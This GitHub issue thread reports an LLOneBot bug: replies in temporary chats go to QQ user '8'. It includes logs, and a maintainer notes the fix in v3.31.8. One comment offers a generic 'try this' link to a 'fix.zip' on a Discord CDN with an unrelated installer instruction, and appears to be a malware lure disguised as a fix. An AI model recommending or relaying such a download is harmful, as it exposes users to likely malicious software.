### ISSUE TITLE
[BUG] 临时对话异常

### ISSUE THREAD

**Issue by lingyunytc** [LLOneBot/LLOneBot#393]
### 系统版本

Windows Server 2022 Datacenter

### QQNT 版本

9.9.15-27597 (64位)

### LLOneBot 版本

3.31.6

### OneBot 客户端

koishi-plugin-adapter-onebot

### 发生了什么?

私聊发送指令，机器人无法正确回复，而是把回复的内容发给一个QQ号为8的用户

在llonebot版本3.28.0是正常的
![312259B9D1FBE4D07275FABBE9571F8A](https://github.com/user-attachments/assets/a513149e-e821-4d5a-bcf7-901d18b28364)

### 如何复现

机器人为管理员，用户是普通群员，用户给机器人发送指令（非好友临时对话）

### 期望的结果?

机器人正常回复用户临时对话指令

### LLOneBot 运行日志

```shell
2024/9/3 20:50:16 ntqq api call failed, nodeIKernelMsgService/sendMsg {"result":1,"errMsg":""} 

2024/9/3 20:50:26 ntqq api timeout IPC_UP_2, ns-ntApi-2, nodeIKernelMsgService/sendMsg ["nodeIKernelMsgService/sendMsg",{"msgId":"0","peer":{"chatType":100,"peerUid":"u_********************_8","guildId":"7410398347298881291"},"msgElements":[{"elementType":1,"elementId":"","textElement":{"content":"今日获取次数已上限，明日再来吧","atType":0,"atUid":"","atTinyId":"","atNtUid":""}}],"msgAttributeInfos":{}},null]
```

### OneBot 客户端运行日志

```shell
session Error: Error with request send_private_msg, args: {"user_id":"8","message":[{"type":"text","data":{"text":"今日获取次数已上限，明日再来吧"}}]}, retcode: 1200
                            at _Internal._get (D:\bot\koishi-desktop-win-x64-v1.1.3\data\instances\default\node_modules\koishi-plugin-adapter-onebot\lib\index.js:119:11)
                            at process.processTicksAndRejections (node:internal/process/task_queues:95:5)
                            at async _Internal.<computed> [as sendPrivateMsg] (D:\bot\koishi-desktop-win-x64-v1.1.3\data\instances\default\node_modules\koishi-plugin-adapter-onebot\lib\index.js:162:20)
                            at async OneBotMessageEncoder.flush (D:\bot\koishi-desktop-win-x64-v1.1.3\data\instances\default\node_modules\koishi-plugin-adapter-onebot\lib\index.js:759:227)
                            at async OneBotMessageEncoder.send (D:\bot\koishi-desktop-win-x64-v1.1.3\data\instances\default\node_modules\@satorijs\core\lib\index.cjs:620:5)
                            at async Proxy.sendMessage (D:\bot\koishi-desktop-win-x64-v1.1.3\data\instances\default\node_modules\@satorijs\core\lib\index.cjs:355:22)
                            at async D:\bot\koishi-desktop-win-x64-v1.1.3\data\instances\default\node_modules\@koishijs\core\lib\index.cjs:2061:7
                            at async Proxy.withScope (D:\bot\koishi-desktop-win-x64-v1.1.3\data\instances\default\node_modules\@koishijs\core\lib\index.cjs:1968:22)
                            at async next (D:\bot\koishi-desktop-win-x64-v1.1.3\data\instances\default\node_modules\@koishijs\core\lib\index.cjs:824:16)
                            at async next (D:\bot\koishi-desktop-win-x64-v1.1.3\data\instances\default\node_modules\@koishijs\core\lib\index.cjs:824:16)
```

**Comment by Limxxx** [comment]
try this
https://cdn.discordapp.com/attachments/1277836331501883449/1280291965879193731/fix.zip?ex=66d78c4f&is=66d63acf&hm=ac05131390b92a2047e3ee0fc4189fe126bf357b3d3cd73f5c0e51ba28c1c538&
select the desired compiler in the installer

**Comment by lingyunytc** [comment]
> 试试这个 https://cdn.discordapp.com/attachments/1277836331501883449/1280291965879193731/fix.zip?ex=66d78c4f&is=66d63acf&hm=ac05131390b92a2047e3ee0fc4189fe126bf357b3d3cd73f5c0e51ba28c1c538&在安装程序中选择所需的编译器

这对我似乎不起作用

**Comment by idranme** [comment]
v3.31.8 已修复
